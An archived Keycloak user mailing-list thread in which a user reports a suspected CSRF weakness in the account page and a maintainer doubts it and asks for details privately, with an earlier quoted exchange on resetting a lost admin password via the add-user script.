[keycloak-user] Possible CSRF issue in account page.
Stian Thorgersen
sthorger at redhat.com
Fri Mar 24 03:57:44 EDT 2017
Please send me the details about this in a direct mail, but it is protected
against CSRF and unless you are using a really old version of Keycloak I
doubt this is an actual vulnerability
On 23 March 2017 at 13:13, Ushanas Shastri <ushanas at gmail.com> wrote:
> Hello,
>
> We have a page where the user account details can be seen (the KeyCloak
> realm/account page).
>
> On that page, the user can update his email address etc.
> As part of security testing, we found that this page is vulnerable to Cross
> Site Request Forgery.
>
> Is this a known issue, or should I report in JIRA?
> Also, is there a way to configure some security options in KeyCloak to
> prevent CSRF?
>
> Regards, Ushanas.
>
> On 23-Mar-2017 10:28 AM, "Ushanas Shastri" <ushanas at gmail.com> wrote:
>
> Thank you, this works.
>
> On 22 March 2017 at 21:39, Marko Strukelj <mstrukel at redhat.com> wrote:
>
> > You can add a new admin user by using add-user-keycloak script:
> > https://keycloak.gitbooks.io/documentation/content/server_ad
> > min/topics/initialization.html.
> >
> > Then you can log into the Admin Console and set a new password for
> > original admin user.
> >
> > On Wed, Mar 22, 2017 at 12:51 PM, Ushanas Shastri <ushanas at gmail.com>
> > wrote:
> >
> >> Hello,
> >> How do I reset the admin password? I don't have the admin password, and
> >> want to be able to reset it like it was a new install.
> >>
> >> Regards, Ushanas.
> >> _______________________________________________
> >> keycloak-user mailing list
> >> keycloak-user at lists.jboss.org
> >> https://lists.jboss.org/mailman/listinfo/keycloak-user
> >>
> >
> >
> _______________________________________________
> keycloak-user mailing list
> keycloak-user at lists.jboss.org
> https://lists.jboss.org/mailman/listinfo/keycloak-user
>
More information about the keycloak-user
mailing list